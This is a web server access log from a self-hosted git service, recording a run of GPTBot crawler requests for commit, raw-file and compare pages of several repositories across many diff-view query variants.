"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16092] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" +[17/Feb/2026:13:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 74.7.227.38] [Length 190761] [Gzip 12.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" +[17/Feb/2026:13:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10850] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 388225] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 387845] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 388226] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 387813] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 8442] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 17046] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:13:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 211417] [Gzip 13.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" +[17/Feb/2026:13:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" [Client 74.7.227.38] [Length 558422] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 8481] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 190231] [Gzip 12.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 190693] [Gzip 12.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 442155] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 441729] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 442170] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 191301] [Gzip 12.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 388200] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 387836] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 388251] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main..a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 11063] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 234364] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 216884] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 17228] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 11297] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" [Client 74.7.227.38] [Length 288754] [Gzip 12.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/main...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" [Client 74.7.227.38] [Length 558410] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 8441] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" +[17/Feb/2026:13:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 442166] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 441711] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 442161] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" [Client 74.7.227.38] [Length 288754] [Gzip 12.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/main..a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 217467] [Gzip 13.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 216728] [Gzip 13.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 387854] [Gzip 13.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main..ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 12462] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:13:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 17045] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:13:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17046] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:13:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 211449] [Gzip 13.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" +[17/Feb/2026:13:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 211448] [Gzip 13.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" +[17/Feb/2026:13:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 441719] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 441698] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 17226] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:13:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17228] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:13:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 234355] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:13:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 234343] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:13:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 190797] [Gzip 12.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 387839] 